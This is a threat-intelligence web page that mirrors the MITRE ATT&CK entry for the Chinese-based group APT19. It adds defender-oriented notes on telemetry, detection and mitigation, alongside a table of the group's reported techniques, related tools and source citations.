G0073: APT19
APT19 is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services. In 2017, a phishing campaign was used to target seven law and investment firms. [1] Some analysts track APT19 and Deep Panda as the same group, but it is unclear from open source information if the groups are the same. [2] [3] [4]
Analyst context for executives and security teams
APT19 is an ATT&CK group entry for a Chinese-based threat group reported to have targeted multiple industries, including defense, finance, energy, pharmaceuticals, telecommunications, high tech, education, manufacturing, and legal services. For leaders, the practical value is not to assume current exposure, but to use the mapped behaviors as a readiness checklist for targeted intrusion scenarios: phishing or drive-by entry, scripted execution, post-exploitation tooling, discovery, persistence, and command-and-control over web protocols.
Executive priority
Prioritize this object where the organization operates in one of the referenced sectors or has high-value legal, investment, intellectual property, regulated, or operational data. The ATT&CK relationships point to controls that often determine resilience against targeted intrusions: email and web initial-access defenses, endpoint visibility for PowerShell and signed Windows utilities, persistence monitoring, and C2 detection over common web traffic. Executives should ask whether SOC and IR teams can prove collection and response coverage for these behaviors rather than relying on group-name blocking or attribution-based assumptions.
Technical view
ATT&CK does not provide a detection section for APT19, so defenders should validate coverage against the related techniques and software instead. Relationship-driven priorities include spearphishing attachments, malicious file execution, drive-by compromise, command and scripting interpreter activity including PowerShell, use of post-exploitation frameworks such as Cobalt Strike and Empire, discovery commands for system/user/network information, registry and service persistence, Run keys/startup folders, DLL abuse, Regsvr32/Rundll32 proxy execution, obfuscation/encoding/deobfuscation, and web-protocol C2. Because the group object has no specified platforms, platform scope should be derived from local assets and the related technique/software platform fields, especially Windows endpoints for PowerShell, registry, services, Regsvr32, Rundll32, and DLL-related behaviors.
Likely telemetry
- Email security logs and message metadata for spearphishing attachment investigations
- Web proxy, DNS, and network security logs for drive-by and web-protocol command-and-control patterns
- Endpoint process creation and command-line telemetry, especially PowerShell and other interpreters
- PowerShell script block/module logging where deployed
- Windows Registry change telemetry for Run keys and other persistence-related modifications
Detection direction
- Do not build coverage around the APT19 name alone; map detections to the related ATT&CK techniques and software relationships.
- Validate alerting for suspicious interpreter usage, encoded or obfuscated command lines, and PowerShell activity that is unusual for the user, host role, or parent process.
- Tune detections for Regsvr32 and Rundll32 to reduce false positives by baselining legitimate administrative and application activity, then alerting on unusual paths, network access, scriptlet-like behavior, or suspicious parent-child process chains where telemetry supports it.
- Correlate initial-access signals such as phishing attachments or suspicious browsing with follow-on execution, discovery, persistence, and outbound web traffic rather than treating each event in isolation.
- Review blind spots in encrypted web traffic inspection, endpoint command-line capture, PowerShell logging, registry auditing, and service-change monitoring.
Mitigation priorities
- Start with initial-access risk reduction: strengthen email attachment controls, user reporting workflows, and web browsing protections for targeted phishing and drive-by scenarios.
- Harden script and interpreter use with least privilege, constrained administrative access, and policy controls appropriate to the environment.
- Improve endpoint hardening and monitoring for Windows persistence paths, including Registry Run keys, startup folders, and service creation or modification.
- Review allowlisting and application control assumptions for signed Windows utilities such as Regsvr32 and Rundll32, since trusted binaries can be abused.
- Ensure incident response playbooks cover post-exploitation frameworks and include containment steps for hosts showing discovery, persistence, and web-based C2 indicators.
Analyst notes and limits
The official group description cites broad industry targeting and a 2017 phishing campaign against seven law and investment firms. It also notes that some analysts track APT19 and Deep Panda as the same group, but that open-source information is unclear. The related techniques provide more operational value than the sparse group-level fields: they describe a pattern of initial access, execution, stealth, discovery, persistence, and command-and-control behaviors that can be validated defensively without making attribution claims.
MITRE provides no official detection text, no group-level platforms, and no tactics directly on the APT19 object. The recommendations above are derived from supplied ATT&CK relationships and external references only. Local relevance depends on the organization’s sector, exposed users, endpoint and cloud footprint, logging maturity, and whether the listed techniques/software behaviors are observable in the environment.
APT19
APT19 is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services. In 2017, a phishing campaign was used to target seven law and investment firms. [1] Some analysts track APT19 and Deep Panda as the same group, but it is unclear from open source information if the groups are the same. [2] [3] [4]
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | An APT19 HTTP malware variant establishes persistence by setting the Registry key |
| Enterprise | T1059.001 | PowerShell Sub-technique | APT19 used PowerShell commands to execute payloads.CitationFireEye APT19 |
| Enterprise | T1564.003 | Hidden Window Sub-technique | APT19 used |
| Enterprise | T1016 | System Network Configuration Discovery | APT19 used an HTTP malware variant and a Port 22 malware variant to collect the MAC address and IP address from the victim’s machine.CitationUnit 42 C0d0so0 Jan 2016 |
| Enterprise | T1033 | System Owner/User Discovery | APT19 used an HTTP malware variant and a Port 22 malware variant to collect the victim’s username.CitationUnit 42 C0d0so0 Jan 2016 |
| Enterprise | T1218.011 | Rundll32 Sub-technique | APT19 configured its payload to inject into the rundll32.exe.CitationFireEye APT19 |
| Enterprise | T1112 | Modify Registry | APT19 uses a Port 22 malware variant to modify several Registry keys.CitationUnit 42 C0d0so0 Jan 2016 |
| Enterprise | T1189 | Drive-by Compromise | APT19 performed a watering hole attack on forbes.com in 2014 to compromise targets.CitationUnit 42 C0d0so0 Jan 2016 |
| Enterprise | T1543.003 | Windows Service Sub-technique | An APT19 Port 22 malware variant registers itself as a service.CitationUnit 42 C0d0so0 Jan 2016 |
| Enterprise | T1071.001 | Web Protocols Sub-technique | |
| Enterprise | T1059 | Command and Scripting Interpreter | APT19 downloaded and launched code within a SCT file.CitationFireEye APT19 |
| Enterprise | T1027.013 | Encrypted/Encoded File Sub-technique | APT19 used Base64 to obfuscate payloads.CitationFireEye APT19 |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | APT19 sent spearphishing emails with malicious attachments in RTF and XLSM formats to deliver initial exploits.CitationFireEye APT19 |
| Enterprise | T1204.002 | Malicious File Sub-technique | APT19 attempted to get users to launch malicious attachments delivered via spearphishing emails.CitationFireEye APT19 |
| Enterprise | T1082 | System Information Discovery | |
| Enterprise | T1132.001 | Standard Encoding Sub-technique | An APT19 HTTP malware variant used Base64 to encode communications to the C2 server.CitationUnit 42 C0d0so0 Jan 2016 |
| Enterprise | T1588.002 | Tool Sub-technique | |
| Enterprise | T1574.001 | DLL Sub-technique | APT19 launched an HTTP malware variant and a Port 22 malware variant using a legitimate executable that loaded the malicious DLL.CitationUnit 42 C0d0so0 Jan 2016 |
| Enterprise | T1218.010 | Regsvr32 Sub-technique | APT19 used Regsvr32 to bypass application control techniques.CitationFireEye APT19 |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | An APT19 HTTP malware variant decrypts strings using single-byte XOR keys.CitationUnit 42 C0d0so0 Jan 2016 |
| Enterprise | T1027.010 | Command Obfuscation Sub-technique | APT19 used Base64 to obfuscate executed commands.CitationFireEye APT19 |
Groups, software, and campaigns
S0154: Cobalt Strike
Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.[1]
In addition to its own capabilities, Cobalt Strike leverages the capabilities of other well-known tools such as Metasploit and Mimikatz.[1]
S0363: Empire
Empire is an open-source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.[1][2][3]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.6 | Current bundle | 9043f41e86b5… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
FireEye APT19
Ahl, I. (2017, June 06). Privileges and Credentials: Phished at the Request of Counsel. Retrieved May 17, 2018.
Open source URL -
[2]
ICIT China's Espionage Jul 2016
Scott, J. and Spaniel, D. (2016, July 28). ICIT Brief - China’s Espionage Dynasty: Economic Death by a Thousand Cuts. Retrieved June 7, 2018.
Open source URL -
[3]
FireEye APT Groups
FireEye. (n.d.). Advanced Persistent Threat Groups. Retrieved August 3, 2018.
Open source URL -
[4]
Unit 42 C0d0so0 Jan 2016
Grunzweig, J., Lee, B. (2016, January 22). New Attacks Linked to C0d0so0 Group. Retrieved August 2, 2018.
Open source URL -
[5]
APT19
(Citation: FireEye APT19)
-
[6]
C0d0so0
(Citation: Unit 42 C0d0so0 Jan 2016)
-
[7]
Codoso
(Citation: Unit 42 C0d0so0 Jan 2016)
-
[8]
Codoso Team
(Citation: FireEye APT Groups)
-
[9]
Dark Reading Codoso Feb 2015
Chickowski, E. (2015, February 10). Chinese Hacking Group Codoso Team Uses Forbes.com As Watering Hole. Retrieved September 13, 2018.
Open source URL -
[10]
Sunshop Group
(Citation: Dark Reading Codoso Feb 2015)
-
[11]
mitre-attack G0073Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.